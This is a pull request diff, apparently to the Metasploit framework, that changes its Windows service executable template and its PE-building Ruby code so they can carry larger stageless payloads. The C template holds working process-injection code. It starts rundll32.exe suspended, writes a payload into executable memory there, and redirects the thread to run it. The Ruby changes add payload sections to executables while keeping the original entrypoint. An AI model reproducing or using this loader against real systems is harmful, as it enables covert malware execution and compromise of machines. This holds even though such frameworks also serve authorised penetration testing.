### PR TITLE
Update exe service templates to support stageless payloads

### DIFF
--- a/data/templates/src/pe/exe_service/template.c
+++ b/data/templates/src/pe/exe_service/template.c
@@ -92,7 +92,8 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 	CONTEXT Context;
 	STARTUPINFO si;
 	PROCESS_INFORMATION pi;
-	void *lpPayload = bPayload;
+	void *lpPayload = &bPayload;
+	void *lpPayloadDest = NULL;
 	unsigned int dwPayloadSize = SCSIZE;
 
 	#if BUILDMODE == 2
@@ -129,14 +130,14 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 
 			GetThreadContext( pi.hThread, &Context );
 
-			lpPayload = VirtualAllocEx( pi.hProcess, NULL, dwPayloadSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE );
-			if( lpPayload )
+			lpPayloadDest = VirtualAllocEx( pi.hProcess, NULL, dwPayloadSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE );
+			if( lpPayloadDest )
 			{
-				WriteProcessMemory( pi.hProcess, lpPayload, &bPayload, dwPayloadSize, NULL );
+				WriteProcessMemory( pi.hProcess, lpPayloadDest, lpPayload, dwPayloadSize, NULL );
 	#ifdef _WIN64
-				Context.Rip = (ULONG_PTR)lpPayload;
+				Context.Rip = (ULONG_PTR)lpPayloadDest;
 	#else
-				Context.Eip = (ULONG_PTR)lpPayload;
+				Context.Eip = (ULONG_PTR)lpPayloadDest;
 	#endif
 				SetThreadContext( pi.hThread, &Context );
 			}

--- a/data/templates/src/pe/exe_service/template.c
+++ b/data/templates/src/pe/exe_service/template.c
@@ -2,14 +2,62 @@
 #include <windows.h>
 
 #define SCSIZE 8192
+#define MAX_SECTION_NAME_SIZE 9
 
 char cServiceName[32] = "SERVICENAME";
-
 char bPayload[SCSIZE] = "PAYLOAD:";
+char bSectionName[MAX_SECTION_NAME_SIZE] = "SECTION:";
+
+typedef struct {
+	// short is 2 bytes, long is 4 bytes
+	WORD  signature;
+	WORD  lastsize;
+	WORD  nblocks;
+	WORD  nreloc;
+	WORD  hdrsize;
+	WORD  minalloc;
+	WORD  maxalloc;
+	WORD  ss;
+	WORD  sp;
+	WORD  checksum;
+	WORD  ip;
+	WORD  cs;
+	WORD  relocpos;
+	WORD  noverlay;
+	WORD  reserved1[4];
+	WORD  oem_id;
+	WORD  oem_info;
+	WORD  reserved2[10];
+	DWORD e_lfanew;
+} DOS_HEADER, *PDOS_HEADER;
 
 SERVICE_STATUS ss;
 
 SERVICE_STATUS_HANDLE hStatus = NULL;
+
+PIMAGE_SECTION_HEADER SectionHeaderFromName(PDOS_HEADER pDosHeader, PVOID pName) {
+	// Retrieve the section header for the specified name.
+	//
+	// PDOS_HEADER pDosHeader: A pointer to the associated DOS header.
+	// PVOID pName:            A pointer to the section header name to retrieve.
+	// Returns: A pointer to the section header or NULL if it could not be
+	// found.
+	PIMAGE_NT_HEADERS pImgNtHeaders = NULL;
+	PIMAGE_SECTION_HEADER pImgSecHeader = NULL;
+	PIMAGE_SECTION_HEADER pImgSecHeaderCursor = NULL;
+	DWORD dwCursor = 0;
+
+	pImgNtHeaders = (PIMAGE_NT_HEADERS)((ULONG_PTR)pDosHeader + pDosHeader->e_lfanew);
+	pImgSecHeader = (PIMAGE_SECTION_HEADER)((ULONG_PTR)pImgNtHeaders + sizeof(IMAGE_NT_HEADERS));
+	for (dwCursor = 0; dwCursor < pImgNtHeaders->FileHeader.NumberOfSections; dwCursor++) {
+		pImgSecHeaderCursor = &pImgSecHeader[dwCursor];
+		if (memcmp(pImgSecHeaderCursor->Name, pName, 8)) {
+			continue;
+		}
+		return pImgSecHeaderCursor;
+	}
+	return NULL;
+}
 
 #if BUILDMODE == 2
 /* hand-rolled bzero allows us to avoid including ms vc runtime */
@@ -44,12 +92,14 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 	CONTEXT Context;
 	STARTUPINFO si;
 	PROCESS_INFORMATION pi;
-	LPVOID lpPayload = NULL;
+	void *lpPayload = bPayload;
+	unsigned int dwPayloadSize = SCSIZE;
 
+	#if BUILDMODE == 2
 	inline_bzero( &ss, sizeof(SERVICE_STATUS) );
 	inline_bzero( &si, sizeof(STARTUPINFO) );
 	inline_bzero( &pi, sizeof(PROCESS_INFORMATION) );
-
+	#endif
 	si.cb = sizeof(STARTUPINFO);
 
 	ss.dwServiceType = SERVICE_WIN32_SHARE_PROCESS;
@@ -64,23 +114,30 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 	{
 		ss.dwCurrentState = SERVICE_RUNNING;
 
+		PDOS_HEADER lpBaseAddress = (PDOS_HEADER) GetModuleHandleA(NULL);
 		SetServiceStatus( hStatus, &ss );
 
+		PIMAGE_SECTION_HEADER section;
+		section = SectionHeaderFromName((PDOS_HEADER) GetModuleHandleA(NULL), bSectionName);
+		if(section) {
+			lpPayload = lpBaseAddress + section->VirtualAddress;
+			dwPayloadSize = section->SizeOfRawData;
+		}
 		if( CreateProcess( NULL, "rundll32.exe", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi ) )
 		{
 			Context.ContextFlags = CONTEXT_FULL;
 
 			GetThreadContext( pi.hThread, &Context );
 
-			lpPayload = VirtualAllocEx( pi.hProcess, NULL, SCSIZE, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE );
+			lpPayload = VirtualAllocEx( pi.hProcess, NULL, dwPayloadSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE );
 			if( lpPayload )
 			{
-				WriteProcessMemory( pi.hProcess, lpPayload, &bPayload, SCSIZE, NULL );
-#ifdef _WIN64
+				WriteProcessMemory( pi.hProcess, lpPayload, &bPayload, dwPayloadSize, NULL );
+	#ifdef _WIN64
 				Context.Rip = (ULONG_PTR)lpPayload;
-#else
+	#else
 				Context.Eip = (ULONG_PTR)lpPayload;
-#endif
+	#endif
 				SetThreadContext( pi.hThread, &Context );
 			}
 

--- a/lib/msf/core/exe/segment_appender.rb
+++ b/lib/msf/core/exe/segment_appender.rb
@@ -42,8 +42,10 @@ module Exe
       pe.sections << s
       pe.invalidate_header
 
-      # Change the entrypoint to our new section
-      pe.optheader.entrypoint = 'new_entrypoint'
+      unless @preserve_entrypoint
+        # Change the entrypoint to our new section
+        pe.optheader.entrypoint = 'new_entrypoint'
+      end
       pe.cpu = pe_orig.cpu
 
       pe.encode_string

--- a/lib/msf/core/exe/segment_injector.rb
+++ b/lib/msf/core/exe/segment_injector.rb
@@ -18,6 +18,7 @@ module Exe
       @arch  = opts[:arch] || :x86
       @buffer_register = opts[:buffer_register]
       @secname = opts[:secname]
+      @preserve_entrypoint = opts[:preserve_entrypoint] || false
       x86_regs = %w{eax ecx edx ebx edi esi}
       x64_regs = %w{rax rcx rdx rbx rdi rsi} + (8..15).map{|n| "r#{n}" }
 

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -693,31 +693,26 @@ require 'digest/sha1'
     # Allow the user to specify their own service EXE template
     set_template_default(opts, "template_x64_windows_svc.exe")
     opts[:exe_type] = :service_exe
-    if code.length >= 8192
-      # Try to inject code into executable by adding a section without affecting executable behavior
-      if opts[:inject]
-        injector = Msf::Exe::SegmentInjector.new({
-         :payload  => code,
-         :template => opts[:template],
-         :arch     => :x64,
-         :secname  => opts[:secname]
-        })
-        pe = injector.generate_pe
-      else
-        # Append a new section instead
-        appender = Msf::Exe::SegmentAppender.new({
-          :payload  => code,
-          :template => opts[:template],
-          :arch     => :x64,
-          :secname	=> opts[:secname]
-        })
-        pe =  appender.generate_pe
-      end
-      
-      return pe
+    # Try to inject code into executable by adding a section without affecting executable behavior
+    if opts[:inject]
+      injector = Msf::Exe::SegmentInjector.new({
+        :payload  => code,
+        :template => opts[:template],
+        :arch     => :x64,
+        :secname  => opts[:secname]
+      })
+      pe = injector.generate_pe
     else
-      return exe_sub_method(code,opts)
+      # Append a new section instead
+      appender = Msf::Exe::SegmentAppender.new({
+        :payload  => code,
+        :template => opts[:template],
+        :arch     => :x64,
+        :secname	=> opts[:secname]
+      })
+      pe =  appender.generate_pe
     end
+    return pe
   end
 
   # self.set_template_default_winpe_dll

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -708,7 +708,8 @@ require 'digest/sha1'
         :payload  => code,
         :template => opts[:template],
         :arch     => :x64,
-        :secname	=> opts[:secname]
+        :secname	=> opts[:secname],
+        :preserve_entrypoint => true
       })
       pe =  appender.generate_pe
     end


### PR DESCRIPTION
This PR updates the `exe` generation of exe-service templates to support larger payloads, such as stageless payloads.